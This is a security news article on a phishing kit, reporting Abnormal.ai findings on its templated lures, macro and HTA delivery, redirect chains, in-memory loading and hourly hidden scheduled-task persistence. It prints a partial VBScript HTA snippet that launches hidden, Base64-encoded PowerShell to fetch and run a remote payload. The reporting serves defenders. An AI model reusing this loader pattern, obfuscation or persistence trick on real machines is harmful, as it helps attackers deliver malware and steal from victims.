A novel phishing kit has surfaced that enables threat actors to craft sophisticated lures with minimal technical expertise.
This “point-and-click” toolkit combines an intuitive web interface with powerful payload delivery mechanisms.
Attackers can select from preconfigured templates, customize branding elements, and target specific organizations or individuals.
Once a phishing page is deployed, victims are presented with seemingly innocuous download prompts that, in reality, trigger the delivery of malicious code.
.webp)
Early incidents show the kit leveraging common file formats such as Microsoft Office documents and HTML applications.
Upon opening, the documents prompt users to enable macros or allow execution of embedded scripts.
Outsourcing the heavy lifting to built-in scripting engines, the kit constructs payloads on the fly, rendering many static signature–based defenses ineffective.
Initial campaign data indicates a significant click-through rate, suggesting the social engineering elements are exceptionally convincing.
Abnormal.ai analysts noted that the kit’s landing pages employ dynamic content injection to evade URL filtering solutions by rotating resource identifiers every few minutes.
This approach frustrates automated scanners and contributes to extended dwell time on victim machines, allowing stealthy payload staging and execution.
Researchers identified instances where the payload download URLs were concealed behind multi-step redirects, disguising their true destination until the final fetch operation.
Furthermore, Abnormal.ai researchers identified that once the victim enables content execution, the embedded script executes a PowerShell one-liner that retrieves and executes the final payload from a remote server.
This PowerShell command is obfuscated in Base64 and wrapped in a compressed archive, bypassing most heuristic engines. Victims remain unaware as the process runs with minimal user interaction and no visible windows.
In-Depth Examination of the Infection Mechanism
At the heart of the kit’s infection chain lies an HTML Application (HTA) module that acts as the initial loader.
.webp)
When the victim clicks “Enable Editing” or “Allow Blocked Content,” the HTA file executes:-
[script language="VBScript"]
Dim objShell
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " & _
"JABlAHgAZQBjAGUAbQBUAG8ARABvAHcAbgBsAG8AZABGAGUAcgBfAFIAZQBzAG8AdQByAGMAZQA9ICJuU0M…"
[/script]This snippet decodes to a PowerShell payload that downloads an encrypted binary, decrypts it in memory, and executes it directly from RAM.
By operating in memory, the kit avoids writing malicious files to disk, undermining file-based detection.
The downloaded binary functions as a modular loader, fetching additional components such as credential stealers or ransomware droppers.
Persistence is achieved by creating a hidden scheduled task that re-launches the loader every hour under the context of the logged-on user.
This tactic ensures continued access even if the initial document is closed or the machine is rebooted. The scheduled task name is randomized for each campaign, complicating manual detection efforts.
Overall, this point-and-click phishing kit represents a significant escalation in accessible attack capabilities, combining user-friendly interfaces with advanced evasion and payload delivery techniques.
Cybersecurity teams must prioritize monitoring for anomalous task scheduler entries and unusual HTA executions, as well as reinforcing user training around enabling content in untrusted documents.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
